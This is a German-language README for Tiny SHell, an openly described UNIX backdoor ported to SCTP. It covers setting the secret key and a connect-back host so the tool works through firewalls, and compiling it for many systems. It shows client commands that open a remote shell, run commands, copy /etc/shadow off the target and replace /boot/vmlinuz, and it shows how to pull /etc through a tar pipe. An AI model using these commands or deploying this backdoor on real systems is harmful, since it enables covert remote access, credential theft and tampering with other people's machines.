
TinySHell port to SCTP
Tiny SHell - Eine quelloffene UNIX-Backdoor
* Vor dem Kompilieren von Tiny SHell
1. Zuerst sollten Sie Ihren geheimen Schlüssel einrichten, der
sich in tsh.h befindet; der Schlüssel kann beliebig lang sein (verwenden
Sie mindestens 12 Zeichen für bessere Sicherheit).
2. Es wird empfohlen, SERVER_PORT zu ändern, den Port, auf dem
der Server auf eingehende Verbindungen wartet.
3. Sie möchten tshd möglicherweise im "connect-back"-Modus starten, falls
es auf einer durch eine Firewall geschützten Maschine läuft; kommentieren Sie einfach
CONNECT_BACK_HOST in tsh.h aus und ändern Sie es.
* Kompilieren von Tiny SHell
Führen Sie "make <system>" aus, wobei <system> eines der folgenden sein kann:
linux, freebsd, openbsd, netbsd, cygwin, sunos, irix, hpux, osf
* Verwendung des Servers
Es kann nützlich sein, $HOME und die Dateierstellungsmaske
vor dem Starten des Servers zu setzen:
% umask 077; HOME=/var/tmp ./tshd
* Verwendung des Clients
Stellen Sie sicher, dass tshd auf dem entfernten Host läuft. Sie können:
- eine Shell starten:
./tsh <hostname>
- einen Befehl ausführen:
./tsh <hostname> "uname -a"
- Dateien übertragen:
./tsh <hostname> get /etc/shadow .
./tsh <hostname> put vmlinuz /boot
Hinweis: Wenn der Server im Connect-Back-Modus läuft, ersetzen
Sie den Hostnamen der entfernten Maschine durch "cb".
* Über mehrere Dateiübertragungen
Derzeit unterstützt Tiny SHell keine scp-ähnlichen mehrfachen
und/oder rekursiven Dateiübertragungen. Sie können diesen Fehler umgehen,
indem Sie einfach ein tar-Archiv erstellen und es übertragen. Beispiel:
./tsh host "stty raw; tar -cf - /etc 2>/dev/null" | tar -xvf -
* Über Terminalmodi
Auf einigen hirntoten Systemen (genauer gesagt IRIX und HP-UX) funktionieren
Strg-C und andere Steuertasten nicht richtig. Beheben Sie es mit:
% stty intr "^C" erase "^H" eof "^D" susp "^Z" kill "^U"
* Über Sicherheit
Bitte denken Sie daran, dass der geheime Schlüssel im Klartext in beiden
ausführbaren Dateien tsh und tshd gespeichert ist; daher sollten Sie sicherstellen,
dass außer Ihnen niemand Lesezugriff auf diese beiden Dateien hat.
Sie können jedoch wählen, den echten (gültigen) Schlüssel nicht im
Client zu speichern, der dann beim Start nach einem Passwort fragt.
* Hinweise zur SCTP-Version:
Bisher nur auf Archlinux getestet, erwarten Sie, dass es auf allem
anderen furchtbar scheitert.
Ist ein ziemlich hässlicher Hack, hat einige Kompilierungsfehler, die ich
irgendwann ausfindig machen und beheben möchte.
Die Sicherheit der Backdoor-Datei (tsh) – d.h. das Passwort im Klartext –
soll bald behoben werden, indem nur ein gehashtes Passwort gespeichert wird.
Tests auf hpux, *bsd usw., sobald ich Zugang zu solchen Systemen habe.